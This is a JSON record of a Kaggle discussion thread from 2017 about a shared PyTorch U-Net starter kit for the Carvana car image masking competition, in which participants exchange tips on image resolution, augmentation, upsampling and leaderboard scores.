{
  "id": 37208,
  "title": "pytorch starter-kit (LB: 0.985) and share your experimental results here!",
  "url": "/competitions/carvana-image-masking-challenge/discussion/37208",
  "author_name": "",
  "post_date": "2017-07-29T03:13:05.231381Z",
  "votes": 135,
  "comment_count": 165,
  "views": 0,
  "content": "<p>you can download my pytorch implementation at:</p>\n\n<p><a href=\"https://drive.google.com/open?id=0B_DICebvRE-kN21SaDhMZWt5U0U\">https://drive.google.com/open?id=0B_DICebvRE-kN21SaDhMZWt5U0U</a></p>\n\n<p>It uses a customized uNet. Please refer to the readme.ppt in the link above for setup and details. Have fun!</p>\n\n<p><img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/208218/6916/starter-kit.png\" alt=\"enter image description here\" title=\"\"></p>\n\n<hr>\n\n<p>software version update:</p>\n\n<p>08-25</p>\n\n<ul>\n<li><p>reference software for:</p>\n\n<p>LB = 0.997 for UNet1024 model in my_unet_baseline.py</p>\n\n<p>LB = 0.991 for UNet128  model in my_unet_baseline.py</p>\n\n<p>training logs are provided. see also <a href=\"https://www.kaggle.com/c/carvana-image-masking-challenge/discussion/38125\">https://www.kaggle.com/c/carvana-image-masking-challenge/discussion/38125</a></p></li>\n<li><p>implement accumulated gradients</p></li>\n<li><p>implement weighted boundary loss</p></li>\n<li><p>implement merge bn into conv for faster inference</p>\n\n<p>the version is <em>not</em> backward compatible with previous version.</p></li>\n</ul>\n\n<p>08-02</p>\n\n<ul>\n<li><p>add UNet_double_1024_5, which use 512x512 as input and predict 1024x1024 mask.</p>\n\n<p>UNet_double_1024_5 obtains LB score of 0.996.</p>\n\n<p>note that many changes are made to support label and image of different size.</p>\n\n<p>some unused functions are broken because of this.</p>\n\n<p>the version is <em>not</em> backward compatible with previous version.</p></li>\n</ul>\n\n<p>07-31</p>\n\n<ul>\n<li><p>add models unet{128,256,512}_{1,2,3} </p>\n\n<p>unet512_2 obtains LB score of 0.995. </p>\n\n<p>The training loss curves are included for reference.</p></li>\n</ul>\n\n<p>07-30</p>\n\n<ul>\n<li><p>support for validation at training</p></li>\n<li><p>add dice loss for back propagation</p></li>\n</ul>\n\n<p>07-29a</p>\n\n<ul>\n<li><p>fix minor bugs</p></li>\n<li><p>add data agumentation in training</p></li>\n<li><p>add visualisation for predictions on train sample during training</p></li>\n</ul>\n\n<p>07-29</p>\n\n<ul>\n<li>initial version</li>\n</ul>",
  "messages": [
    {
      "id": "208218",
      "postDate": "07/29/2017 03:13:05",
      "content": "<p>you can download my pytorch implementation at:</p>\n\n<p><a href=\"https://drive.google.com/open?id=0B_DICebvRE-kN21SaDhMZWt5U0U\">https://drive.google.com/open?id=0B_DICebvRE-kN21SaDhMZWt5U0U</a></p>\n\n<p>It uses a customized uNet. Please refer to the readme.ppt in the link above for setup and details. Have fun!</p>\n\n<p><img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/208218/6916/starter-kit.png\" alt=\"enter image description here\" title=\"\"></p>\n\n<hr>\n\n<p>software version update:</p>\n\n<p>08-25</p>\n\n<ul>\n<li><p>reference software for:</p>\n\n<p>LB = 0.997 for UNet1024 model in my_unet_baseline.py</p>\n\n<p>LB = 0.991 for UNet128  model in my_unet_baseline.py</p>\n\n<p>training logs are provided. see also <a href=\"https://www.kaggle.com/c/carvana-image-masking-challenge/discussion/38125\">https://www.kaggle.com/c/carvana-image-masking-challenge/discussion/38125</a></p></li>\n<li><p>implement accumulated gradients</p></li>\n<li><p>implement weighted boundary loss</p></li>\n<li><p>implement merge bn into conv for faster inference</p>\n\n<p>the version is <em>not</em> backward compatible with previous version.</p></li>\n</ul>\n\n<p>08-02</p>\n\n<ul>\n<li><p>add UNet_double_1024_5, which use 512x512 as input and predict 1024x1024 mask.</p>\n\n<p>UNet_double_1024_5 obtains LB score of 0.996.</p>\n\n<p>note that many changes are made to support label and image of different size.</p>\n\n<p>some unused functions are broken because of this.</p>\n\n<p>the version is <em>not</em> backward compatible with previous version.</p></li>\n</ul>\n\n<p>07-31</p>\n\n<ul>\n<li><p>add models unet{128,256,512}_{1,2,3} </p>\n\n<p>unet512_2 obtains LB score of 0.995. </p>\n\n<p>The training loss curves are included for reference.</p></li>\n</ul>\n\n<p>07-30</p>\n\n<ul>\n<li><p>support for validation at training</p></li>\n<li><p>add dice loss for back propagation</p></li>\n</ul>\n\n<p>07-29a</p>\n\n<ul>\n<li><p>fix minor bugs</p></li>\n<li><p>add data agumentation in training</p></li>\n<li><p>add visualisation for predictions on train sample during training</p></li>\n</ul>\n\n<p>07-29</p>\n\n<ul>\n<li>initial version</li>\n</ul>",
      "rawMarkdown": "you can download my pytorch implementation at:\n\nhttps://drive.google.com/open?id=0B_DICebvRE-kN21SaDhMZWt5U0U\n\nIt uses a customized uNet. Please refer to the readme.ppt in the link above for setup and details. Have fun!\n\n ![enter image description here][1]\n\n\n  [1]: https://kaggle2.blob.core.windows.net/forum-message-attachments/208218/6916/starter-kit.png\n\n--------------------------------------------------------------\nsoftware version update:\n\n08-25\n\n- reference software for:\n\n   LB = 0.997 for UNet1024 model in my_unet_baseline.py\n\n   LB = 0.991 for UNet128  model in my_unet_baseline.py\n\n training logs are provided. see also https://www.kaggle.com/c/carvana-image-masking-challenge/discussion/38125\n\n- implement accumulated gradients\n\n- implement weighted boundary loss\n\n- implement merge bn into conv for faster inference\n\n  the version is *not* backward compatible with previous version.\n\n\n\n\n08-02\n\n- add UNet_double_1024_5, which use 512x512 as input and predict 1024x1024 mask.\n\n  UNet_double_1024_5 obtains LB score of 0.996.\n\n  note that many changes are made to support label and image of different size.\n\n  some unused functions are broken because of this.\n\n  the version is *not* backward compatible with previous version.\n  \n\n\n07-31\n\n- add models unet{128,256,512}_{1,2,3} \n\n  unet512_2 obtains LB score of 0.995. \n\n  The training loss curves are included for reference.\n\n\n\n07-30\n\n- support for validation at training\n\n- add dice loss for back propagation\n\n\n07-29a\n\n- fix minor bugs\n\n- add data agumentation in training\n\n- add visualisation for predictions on train sample during training\n\n07-29\n\n-  initial version",
      "votes": null
    },
    {
      "id": "208226",
      "postDate": "07/29/2017 04:11:11",
      "content": "<p>Thank you so much.</p>",
      "rawMarkdown": "Thank you so much.",
      "votes": null
    },
    {
      "id": "208227",
      "postDate": "07/29/2017 04:15:06",
      "content": "<p>Have you taken a look at </p>\n\n<p><a href=\"https://github.com/mzaradzki/neuralnets/tree/master/vgg_segmentation_keras\">https://github.com/mzaradzki/neuralnets/tree/master/vgg_segmentation_keras</a>\n<a href=\"https://aboveintelligent.com/face-recognition-with-keras-and-opencv-2baf2a83b799\">https://aboveintelligent.com/face-recognition-with-keras-and-opencv-2baf2a83b799</a>\n<a href=\"http://www.vlfeat.org/matconvnet/pretrained/#semantic-segmentation\">http://www.vlfeat.org/matconvnet/pretrained/#semantic-segmentation</a>\n<a href=\"https://github.com/nicolov/segmentation_keras\">https://github.com/nicolov/segmentation_keras</a></p>\n\n<p>and particularly <a href=\"https://github.com/jocicmarko/ultrasound-nerve-segmentation\">https://github.com/jocicmarko/ultrasound-nerve-segmentation</a>?</p>\n\n<p>Heng, can't thank you enough for your activity on Kaggle. I've learned a bunch from you. Hope you win this one!</p>",
      "rawMarkdown": "Have you taken a look at \n\nhttps://github.com/mzaradzki/neuralnets/tree/master/vgg_segmentation_keras\nhttps://aboveintelligent.com/face-recognition-with-keras-and-opencv-2baf2a83b799\nhttp://www.vlfeat.org/matconvnet/pretrained/#semantic-segmentation\nhttps://github.com/nicolov/segmentation_keras\n\nand particularly https://github.com/jocicmarko/ultrasound-nerve-segmentation?\n\nHeng, can't thank you enough for your activity on Kaggle. I've learned a bunch from you. Hope you win this one!",
      "votes": null
    },
    {
      "id": "208231",
      "postDate": "07/29/2017 04:43:29",
      "content": "<p>Thanks for your sharing,and can I ask how much time do you cost when you generate a submit or predict? I'm also using pytorch and I generate a predict in the test set may cost 2~3 hours,it is too slow.</p>",
      "rawMarkdown": "Thanks for your sharing,and can I ask how much time do you cost when you generate a submit or predict? I'm also using pytorch and I generate a predict in the test set may cost 2~3 hours,it is too slow.",
      "votes": null
    },
    {
      "id": "208235",
      "postDate": "07/29/2017 05:24:04",
      "content": "<p>you can check this post:\n<a href=\"https://www.kaggle.com/c/carvana-image-masking-challenge/discussion/37203\">https://www.kaggle.com/c/carvana-image-masking-challenge/discussion/37203</a></p>\n\n<p>It takes about 20 min to predict the masks using CNN, an another 20 min the make csv file.</p>",
      "rawMarkdown": "you can check this post:\nhttps://www.kaggle.com/c/carvana-image-masking-challenge/discussion/37203\n\nIt takes about 20 min to predict the masks using CNN, an another 20 min the make csv file.",
      "votes": null
    },
    {
      "id": "208247",
      "postDate": "07/29/2017 05:55:07",
      "content": "<p>Oh,Thanks,that's very  effective~~</p>",
      "rawMarkdown": "Oh,Thanks,that's very  effective~~",
      "votes": null
    },
    {
      "id": "208326",
      "postDate": "07/29/2017 12:31:04",
      "content": "<p>what does 0.988, 0.990, 0.992, 0.996 look like? I upload some files for your reference.\nThese are train errors i got on my train images.</p>\n\n<p>From these images, the errors are can be corrected if you know something about the car model (e.g. the bumper is black and has to careful not to confuse with shadow). Dimension of the car might help.</p>\n\n<p>maybe this is how meta data can be used.</p>",
      "rawMarkdown": "what does 0.988, 0.990, 0.992, 0.996 look like? I upload some files for your reference.\nThese are train errors i got on my train images.\n\nFrom these images, the errors are can be corrected if you know something about the car model (e.g. the bumper is black and has to careful not to confuse with shadow). Dimension of the car might help.\n\nmaybe this is how meta data can be used.",
      "votes": null
    },
    {
      "id": "208447",
      "postDate": "07/29/2017 20:10:33",
      "content": "<p>Hi Heng CherKeng! </p>\n\n<p>You're involvement in the public forums is simply awesome! I love how you share a LOT of comp. vision type models (particularly in PyTorch)! </p>\n\n<p>I was wondering whether you can post your implementation on Github, so that we can view the code online... </p>\n\n<p>Great work, keep it up ;) In fact, I'm actually planning to learn PyTorch via this competition, starting from your code. Good luck! ;))</p>",
      "rawMarkdown": "Hi Heng CherKeng! \n\nYou're involvement in the public forums is simply awesome! I love how you share a LOT of comp. vision type models (particularly in PyTorch)! \n\nI was wondering whether you can post your implementation on Github, so that we can view the code online... \n\nGreat work, keep it up ;) In fact, I'm actually planning to learn PyTorch via this competition, starting from your code. Good luck! ;))",
      "votes": null
    },
    {
      "id": "208448",
      "postDate": "07/29/2017 20:11:12",
      "content": "<p>Increasing Image Size helps, currently using 256 x256 with Keras U-net. </p>\n\n<p>128 x 128 -&gt; 98.5</p>\n\n<p>256 x 256 -&gt; 99.1</p>",
      "rawMarkdown": "Increasing Image Size helps, currently using 256 x256 with Keras U-net. \n\n128 x 128 -&gt; 98.5\n\n256 x 256 -&gt; 99.1",
      "votes": null
    },
    {
      "id": "208479",
      "postDate": "07/29/2017 23:18:53",
      "content": "<p>Thanks Heng for sharing. I am hoping to reproduce this with Keras as I don't have PyTorch.</p>\n\n<p>How long was the training time? <br>\nWhat was the batch size?</p>",
      "rawMarkdown": "Thanks Heng for sharing. I am hoping to reproduce this with Keras as I don't have PyTorch.\n\nHow long was the training time?  \nWhat was the batch size?",
      "votes": null
    },
    {
      "id": "208490",
      "postDate": "07/30/2017 00:46:34",
      "content": "<p>thanks for the information! it helps</p>",
      "rawMarkdown": "thanks for the information! it helps",
      "votes": null
    },
    {
      "id": "208492",
      "postDate": "07/30/2017 00:48:45",
      "content": "<p>some segmentation model for pytorch which you can used: </p>\n\n<p><a href=\"https://github.com/bodokaiser/piwise\">https://github.com/bodokaiser/piwise</a></p>\n\n<p><a href=\"https://github.com/meetshah1995/pytorch-semseg\">https://github.com/meetshah1995/pytorch-semseg</a></p>\n\n<p>some discussion</p>\n\n<p><a href=\"https://discuss.pytorch.org/t/semantic-segmentation-perform-bad/1892/6\">https://discuss.pytorch.org/t/semantic-segmentation-perform-bad/1892/6</a></p>\n\n<p>you may want to try these. i think their implementations may be better than mine.</p>",
      "rawMarkdown": "some segmentation model for pytorch which you can used: \n\nhttps://github.com/bodokaiser/piwise\n\nhttps://github.com/meetshah1995/pytorch-semseg\n\nsome discussion\n\nhttps://discuss.pytorch.org/t/semantic-segmentation-perform-bad/1892/6\n\nyou may want to try these. i think their implementations may be better than mine.",
      "votes": null
    },
    {
      "id": "208494",
      "postDate": "07/30/2017 00:53:13",
      "content": "<p>be careful of those imagenet models. the py files are modified (the naming of the layers had changed) and may not work if you pretrained downloaed from the pytorch repository. you may wan to use the original imagenet py model from the pytorch repository.</p>\n\n<p>i will post the modiifed pretrained models later</p>",
      "rawMarkdown": "be careful of those imagenet models. the py files are modified (the naming of the layers had changed) and may not work if you pretrained downloaed from the pytorch repository. you may wan to use the original imagenet py model from the pytorch repository.\n\ni will post the modiifed pretrained models later",
      "votes": null
    },
    {
      "id": "208521",
      "postDate": "07/30/2017 04:55:16",
      "content": "<p>It was very generous of you to share your work. Your work is fantastic. I  just wonder if you have already look at CRF-RNN <a href=\"https://github.com/torrvision/crfasrnn\">https://github.com/torrvision/crfasrnn</a> which might be more promising? </p>",
      "rawMarkdown": "It was very generous of you to share your work. Your work is fantastic. I  just wonder if you have already look at CRF-RNN https://github.com/torrvision/crfasrnn which might be more promising?",
      "votes": null
    },
    {
      "id": "208595",
      "postDate": "07/30/2017 10:23:37",
      "content": "<p>If you are training your model with 128x128 size pictures, then how will you predict the test images with size 1918x1280 since the model expects a tensor of (None, 128, 128, 3)?</p>",
      "rawMarkdown": "If you are training your model with 128x128 size pictures, then how will you predict the test images with size 1918x1280 since the model expects a tensor of (None, 128, 128, 3)?",
      "votes": null
    },
    {
      "id": "208597",
      "postDate": "07/30/2017 10:26:39",
      "content": "<p>e.g. the predicted mask is 128 x 128 and now you resize the image up to 1918x1280. </p>\n\n<p>Depending on the resize function you can loose information, so training on bigger images should in general yield better results.</p>",
      "rawMarkdown": "e.g. the predicted mask is 128 x 128 and now you resize the image up to 1918x1280. \n\nDepending on the resize function you can loose information, so training on bigger images should in general yield better results.",
      "votes": null
    },
    {
      "id": "208598",
      "postDate": "07/30/2017 10:26:54",
      "content": "<p>resize image and ground truth mask to NxN at train. predict NxN mask at test. then upscale NxN to  1918x1280 . Not the best solution, but it is a start</p>",
      "rawMarkdown": "resize image and ground truth mask to NxN at train. predict NxN mask at test. then upscale NxN to  1918x1280 . Not the best solution, but it is a start",
      "votes": null
    },
    {
      "id": "208639",
      "postDate": "07/30/2017 12:44:33",
      "content": "<p>Works fine with 480*720 patches ^_^ </p>",
      "rawMarkdown": "Works fine with 480*720 patches ^_^",
      "votes": null
    },
    {
      "id": "208640",
      "postDate": "07/30/2017 12:45:59",
      "content": "<p>thanks for the infor!</p>",
      "rawMarkdown": "thanks for the infor!",
      "votes": null
    },
    {
      "id": "208645",
      "postDate": "07/30/2017 12:58:20",
      "content": "<p>which batch size do you train? </p>",
      "rawMarkdown": "which batch size do you train?",
      "votes": null
    },
    {
      "id": "208647",
      "postDate": "07/30/2017 13:00:42",
      "content": "<p>some early experiment results</p>\n\n<p><img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/208647/6946/exp.png\" alt=\"enter image description here\" title=\"\"></p>\n\n<p><img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/208647/6951/exp2.png\" alt=\"enter image description here\" title=\"\"></p>",
      "rawMarkdown": "some early experiment results\n\n ![enter image description here][1]\n\n ![enter image description here][2]\n\n\n  [1]: https://kaggle2.blob.core.windows.net/forum-message-attachments/208647/6946/exp.png\n  [2]: https://kaggle2.blob.core.windows.net/forum-message-attachments/208647/6951/exp2.png",
      "votes": null
    },
    {
      "id": "208648",
      "postDate": "07/30/2017 13:13:13",
      "content": "<p>batch_size = 4 with Adam optimizer, trained overnight with 50 epochs, lr divided by 10 on 10, 20 and 50 epoch. </p>",
      "rawMarkdown": "batch_size = 4 with Adam optimizer, trained overnight with 50 epochs, lr divided by 10 on 10, 20 and 50 epoch.",
      "votes": null
    },
    {
      "id": "208649",
      "postDate": "07/30/2017 13:23:04",
      "content": "<p>thxs will test ur image size this night :D</p>",
      "rawMarkdown": "thxs will test ur image size this night :D",
      "votes": null
    },
    {
      "id": "208652",
      "postDate": "07/30/2017 13:55:43",
      "content": "<p>note that the prediction size can be bigger than input size. it is like super resolution.</p>\n\n<p>e.g. prediction_mask (input_128x128) = mask_256x256</p>\n\n<p>change bilinear upsampling layer to learnable deconvolution layer (aka transpose convolution)</p>\n\n<p>...</p>\n\n<p>also, you can start to modify your unet to be like:</p>\n\n<p>input_NxN --&gt; [ resnet ] --&gt; resNet_features_FxF --&gt; [uNet] --&gt; mask_KxK </p>",
      "rawMarkdown": "note that the prediction size can be bigger than input size. it is like super resolution.\n\ne.g. prediction_mask (input_128x128) = mask_256x256\n\nchange bilinear upsampling layer to learnable deconvolution layer (aka transpose convolution)\n\n...\n\nalso, you can start to modify your unet to be like:\n\ninput_NxN --&gt; [ resnet ] --&gt; resNet_features_FxF --&gt; [uNet] --&gt; mask_KxK",
      "votes": null
    },
    {
      "id": "208672",
      "postDate": "07/30/2017 14:45:28",
      "content": "<p>Another way could be to split images into smaller patches without downscaling. For example, we could split 1920*1280 into 720*480 patches with small overlap and that way it will be possible to train network with full resolution images</p>",
      "rawMarkdown": "Another way could be to split images into smaller patches without downscaling. For example, we could split 1920*1280 into 720*480 patches with small overlap and that way it will be possible to train network with full resolution images",
      "votes": null
    },
    {
      "id": "208674",
      "postDate": "07/30/2017 14:49:08",
      "content": "<p>Managed to run it with 1088x720 and batch 2. Still 3.2x downsampling.</p>",
      "rawMarkdown": "Managed to run it with 1088x720 and batch 2. Still 3.2x downsampling.",
      "votes": null
    },
    {
      "id": "208676",
      "postDate": "07/30/2017 14:57:34",
      "content": "<p>&gt;&gt;Another way could be to split images into smaller patches</p>\n\n<p>i have about the same idea. Please see attachment picture.</p>\n\n<p><img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/208677/6950/high.png\" alt=\"enter image description here\" title=\"\"></p>",
      "rawMarkdown": "&gt;&gt;Another way could be to split images into smaller patches\n\ni have about the same idea. Please see attachment picture.\n\n ![enter image description here][1]\n\n\n  [1]: https://kaggle2.blob.core.windows.net/forum-message-attachments/208677/6950/high.png",
      "votes": null
    },
    {
      "id": "208677",
      "postDate": "07/30/2017 14:57:55",
      "content": "<p>&lt;</p>",
      "rawMarkdown": "&lt;",
      "votes": null
    },
    {
      "id": "208678",
      "postDate": "07/30/2017 15:09:52",
      "content": "<p>here is another idea. </p>\n\n<p>Say if we we are given 100x100 mask as ground truth. During training, we upsize the ground truth to 200x200 and train a network to predict 200x200. Then we download size 200x200 to 100x100 as final prediction results. This may has the 'effect' of averaging neighboring pixel predictions to predict current pixel.</p>",
      "rawMarkdown": "here is another idea. \n\nSay if we we are given 100x100 mask as ground truth. During training, we upsize the ground truth to 200x200 and train a network to predict 200x200. Then we download size 200x200 to 100x100 as final prediction results. This may has the 'effect' of averaging neighboring pixel predictions to predict current pixel.",
      "votes": null
    },
    {
      "id": "208681",
      "postDate": "07/30/2017 15:17:47",
      "content": "<p>Don't know, seems too complex to me. Advantage of end-to-end Unet is that it could have both local and global information (i.e. it can predict where the car is and also detect very precise boundary using this information). If we select very small patches near boundary there will be less context information (it is very hard to understand what is in small patch -- is it boundary of a car or boundary of letter in the background and so on)</p>",
      "rawMarkdown": "Don't know, seems too complex to me. Advantage of end-to-end Unet is that it could have both local and global information (i.e. it can predict where the car is and also detect very precise boundary using this information). If we select very small patches near boundary there will be less context information (it is very hard to understand what is in small patch -- is it boundary of a car or boundary of letter in the background and so on)",
      "votes": null
    },
    {
      "id": "208682",
      "postDate": "07/30/2017 15:19:17",
      "content": "<p>the patches can be big. e.g 25% of original image size.</p>\n\n<p>results of low resolution prediction (and maybe location of patch encoded as pixel information e.g. via distance transform) can be added as input to the high resolution network as well.</p>",
      "rawMarkdown": "the patches can be big. e.g 25% of original image size.\n\nresults of low resolution prediction (and maybe location of patch encoded as pixel information e.g. via distance transform) can be added as input to the high resolution network as well.",
      "votes": null
    },
    {
      "id": "208703",
      "postDate": "07/30/2017 17:41:11",
      "content": "<p>new experiment results. surprised that 128x128 can achieve LB 0.989. Unet_1 = my initial design unet.  Unet_2 = design from Keras reference. Tips:</p>\n\n<ul>\n<li>train your CNN long enough</li>\n<li><p>design your unet properly ... try different number of filters</p>\n\n<p><img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/208703/6952/exp3.png\" alt=\"enter image description here\" title=\"\"></p></li>\n</ul>",
      "rawMarkdown": "new experiment results. surprised that 128x128 can achieve LB 0.989. Unet_1 = my initial design unet.  Unet_2 = design from Keras reference. Tips:\n\n - train your CNN long enough\n - design your unet properly ... try different number of filters\n\n ![enter image description here][1]\n\n\n  [1]: https://kaggle2.blob.core.windows.net/forum-message-attachments/208703/6952/exp3.png",
      "votes": null
    },
    {
      "id": "208708",
      "postDate": "07/30/2017 17:57:41",
      "content": "<p>Awesome results! How about using 192*128 -- it will be the same proportions as original image. Also, I'd suggest using cv2.INTERP_AREA instead of default. It will make downsampled images more \"smooth\" without aliasing effects. I think it will allow to break into 0.99+ area.</p>",
      "rawMarkdown": "Awesome results! How about using 192*128 -- it will be the same proportions as original image. Also, I'd suggest using cv2.INTERP_AREA instead of default. It will make downsampled images more \"smooth\" without aliasing effects. I think it will allow to break into 0.99+ area.",
      "votes": null
    },
    {
      "id": "208722",
      "postDate": "07/30/2017 18:59:51",
      "content": "<p>I have a question about difference between LB score and validation score.\nI have trained model on 256x256 images. I get validation Dice Error ~0.991.</p>\n\n<p>But when I resize prediction to full resolution, at validation  set I get 0.986 (which is consistent with my LB score).\nI'm thinking if such big drop is sth natural or  I screwed the up-sampling part for prediction (I just use resize and threshold to have only binary values). After my analyse, look like my model learned nice the down-sampled masks, but also with all down-sample artifacts. Or I have sth wrong in my pipeline,\nHow does you pipeline look like?</p>",
      "rawMarkdown": "I have a question about difference between LB score and validation score.\nI have trained model on 256x256 images. I get validation Dice Error ~0.991.\n\nBut when I resize prediction to full resolution, at validation  set I get 0.986 (which is consistent with my LB score).\nI'm thinking if such big drop is sth natural or  I screwed the up-sampling part for prediction (I just use resize and threshold to have only binary values). After my analyse, look like my model learned nice the down-sampled masks, but also with all down-sample artifacts. Or I have sth wrong in my pipeline,\nHow does you pipeline look like?",
      "votes": null
    },
    {
      "id": "208732",
      "postDate": "07/30/2017 19:48:41",
      "content": "<p>This is fine. Your model learns downsampled masks very carefully but they are still downsampled and don't contain all the information of full-sized masks no matter how you will upsample predictions. I got higher score by using 720*480 masks. Currently training 1088x720 ^_^</p>",
      "rawMarkdown": "This is fine. Your model learns downsampled masks very carefully but they are still downsampled and don't contain all the information of full-sized masks no matter how you will upsample predictions. I got higher score by using 720*480 masks. Currently training 1088x720 ^_^",
      "votes": null
    },
    {
      "id": "208771",
      "postDate": "07/31/2017 02:03:06",
      "content": "<p>Does DA useful ? I'm trying to use rot and flip,but the result become more worse.</p>",
      "rawMarkdown": "Does DA useful ? I'm trying to use rot and flip,but the result become more worse.",
      "votes": null
    },
    {
      "id": "208774",
      "postDate": "07/31/2017 02:44:08",
      "content": "<p>Rotated image is far from val/test image, so I guess it is not a good way. I haven't tried but horizontal flip, horizonal/vertical pixel shift and brightness/contrast change should be good..</p>",
      "rawMarkdown": "Rotated image is far from val/test image, so I guess it is not a good way. I haven't tried but horizontal flip, horizonal/vertical pixel shift and brightness/contrast change should be good..",
      "votes": null
    },
    {
      "id": "208775",
      "postDate": "07/31/2017 02:51:09",
      "content": "<p>I got 0.993 with 320x480 (1/4 scale) with Keras U-net\nI can see 1 to 4 pixel discrepancy around car boundary as expected. </p>\n\n<p>I also attempt the full-scale image, but it seems to be worse at least for first a few epoch - may be I need more U-net depth, but it becomes too slow to run.</p>",
      "rawMarkdown": "I got 0.993 with 320x480 (1/4 scale) with Keras U-net\nI can see 1 to 4 pixel discrepancy around car boundary as expected. \n\nI also attempt the full-scale image, but it seems to be worse at least for first a few epoch - may be I need more U-net depth, but it becomes too slow to run.",
      "votes": null
    },
    {
      "id": "208779",
      "postDate": "07/31/2017 03:30:16",
      "content": "<p>I think using DA will add some noise.It can improve the robust of the model sometimes,but in this competition we can get 0.99+ precision,so maybe the noise is harmful.</p>",
      "rawMarkdown": "I think using DA will add some noise.It can improve the robust of the model sometimes,but in this competition we can get 0.99+ precision,so maybe the noise is harmful.",
      "votes": null
    },
    {
      "id": "208795",
      "postDate": "07/31/2017 05:01:32",
      "content": "<p>i am now preparing the experiment write up and code for next release for 0.995 results. Here is a quick summary of my new experiments:</p>\n\n<ol>\n<li><p>using bilinear upsampling is better than deconvolution layer in unet (which i don't know why ... i suspect overfitting)</p></li>\n<li><p>different sizes on LB: 128x128=0.989(batch=32), 256x256=0.992(30), 512x512=0.995(16)</p></li>\n<li><p>augmentation. I use scale+shift. adding non-uniform scaling (change of aspect) worsen the results a little.</p></li>\n</ol>\n\n<p>it seems that everyone now knows how to move towards 0.999. the battle now is who has the most gpu resources. imagine if i can train in full resolution with multi-gpus!</p>\n\n<h2>note: the results are non conclusive. it is possible that you get different results. my results are only for reference. for details of experiments, please wait for my next post.</h2>\n\n<p>Updated! The reason that deconvolution filter didn't work well could be becuase i forget to initialise them with bilinear weights. I will check that later.</p>",
      "rawMarkdown": "i am now preparing the experiment write up and code for next release for 0.995 results. Here is a quick summary of my new experiments:\n\n 1.  using bilinear upsampling is better than deconvolution layer in unet (which i don't know why ... i suspect overfitting)\n\n 2. different sizes on LB: 128x128=0.989(batch=32), 256x256=0.992(30), 512x512=0.995(16)\n\n 3. augmentation. I use scale+shift. adding non-uniform scaling (change of aspect) worsen the results a little.\n\nit seems that everyone now knows how to move towards 0.999. the battle now is who has the most gpu resources. imagine if i can train in full resolution with multi-gpus!\n\n## note: the results are non conclusive. it is possible that you get different results. my results are only for reference. for details of experiments, please wait for my next post.\n\nUpdated! The reason that deconvolution filter didn't work well could be becuase i forget to initialise them with bilinear weights. I will check that later.",
      "votes": null
    },
    {
      "id": "208798",
      "postDate": "07/31/2017 05:12:11",
      "content": "<p>different resizing (bilinear, cubic, area, learnable) will be my next experiments. Also I will be trying scling without changing the aspect of the original image. I will report results later. Thanks for the hints and  advice!</p>",
      "rawMarkdown": "different resizing (bilinear, cubic, area, learnable) will be my next experiments. Also I will be trying scling without changing the aspect of the original image. I will report results later. Thanks for the hints and  advice!",
      "votes": null
    },
    {
      "id": "208824",
      "postDate": "07/31/2017 07:16:36",
      "content": "<p>Hey , Can you provide the Keras version of Unet.\nThanks in advance</p>",
      "rawMarkdown": "Hey , Can you provide the Keras version of Unet.\nThanks in advance",
      "votes": null
    },
    {
      "id": "208834",
      "postDate": "07/31/2017 07:42:42",
      "content": "<p>the bigger size,the higher LB.</p>",
      "rawMarkdown": "the bigger size,the higher LB.",
      "votes": null
    },
    {
      "id": "208839",
      "postDate": "07/31/2017 08:05:55",
      "content": "<p>inspired by @ironbar post: <a href=\"https://www.kaggle.com/ironbar/getting-a-meaning-of-the-score\">https://www.kaggle.com/ironbar/getting-a-meaning-of-the-score</a>, i try to find the limits of using training labels of different sizes. Conclusion is that \"size does matters\" !</p>\n\n<p>Here are the results:\n <img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/208839/6954/size.png\" alt=\"enter image description here\" title=\"\"></p>",
      "rawMarkdown": "inspired by @ironbar post: https://www.kaggle.com/ironbar/getting-a-meaning-of-the-score, i try to find the limits of using training labels of different sizes. Conclusion is that \"size does matters\" !\n\nHere are the results:\n ![enter image description here][1]\n\n\n  [1]: https://kaggle2.blob.core.windows.net/forum-message-attachments/208839/6954/size.png",
      "votes": null
    },
    {
      "id": "208843",
      "postDate": "07/31/2017 08:44:47",
      "content": "<p>updated. use this with code release '07-31'</p>\n\n<p><img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/208843/6955/exp4.png\" alt=\"enter image description here\" title=\"\"></p>",
      "rawMarkdown": "updated. use this with code release '07-31'\n\n ![enter image description here][1]\n\n\n  [1]: https://kaggle2.blob.core.windows.net/forum-message-attachments/208843/6955/exp4.png",
      "votes": null
    },
    {
      "id": "208849",
      "postDate": "07/31/2017 09:07:38",
      "content": "<p>comparing 128,256,512 unet. It seems that 32 epoch is not optimum. Also there is no overfitting. Then green mask is example of prediction on test image. </p>\n\n<p><img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/208849/6956/exp5.png\" alt=\"enter image description here\" title=\"\"></p>",
      "rawMarkdown": "comparing 128,256,512 unet. It seems that 32 epoch is not optimum. Also there is no overfitting. Then green mask is example of prediction on test image. \n\n  ![enter image description here][1]\n\n\n  [1]: https://kaggle2.blob.core.windows.net/forum-message-attachments/208849/6956/exp5.png",
      "votes": null
    },
    {
      "id": "208850",
      "postDate": "07/31/2017 09:09:37",
      "content": "<p>You might also find this useful: <a href=\"https://github.com/mrgloom/awesome-semantic-segmentation\">https://github.com/mrgloom/awesome-semantic-segmentation</a></p>\n\n<p>It contains links to all the papers and implementations (not only in pytorch) of segmentation networks.</p>",
      "rawMarkdown": "You might also find this useful: https://github.com/mrgloom/awesome-semantic-segmentation\n\nIt contains links to all the papers and implementations (not only in pytorch) of segmentation networks.",
      "votes": null
    },
    {
      "id": "208852",
      "postDate": "07/31/2017 09:17:20",
      "content": "<p>you can check the post below</p>",
      "rawMarkdown": "you can check the post below",
      "votes": null
    },
    {
      "id": "208854",
      "postDate": "07/31/2017 09:18:21",
      "content": "<p>thank you for the link, in particular,  \"jocicmarko/ultrasound-nerve-segmentation\" unet structure helps!</p>",
      "rawMarkdown": "thank you for the link, in particular,  \"jocicmarko/ultrasound-nerve-segmentation\" unet structure helps!",
      "votes": null
    },
    {
      "id": "208855",
      "postDate": "07/31/2017 09:35:56",
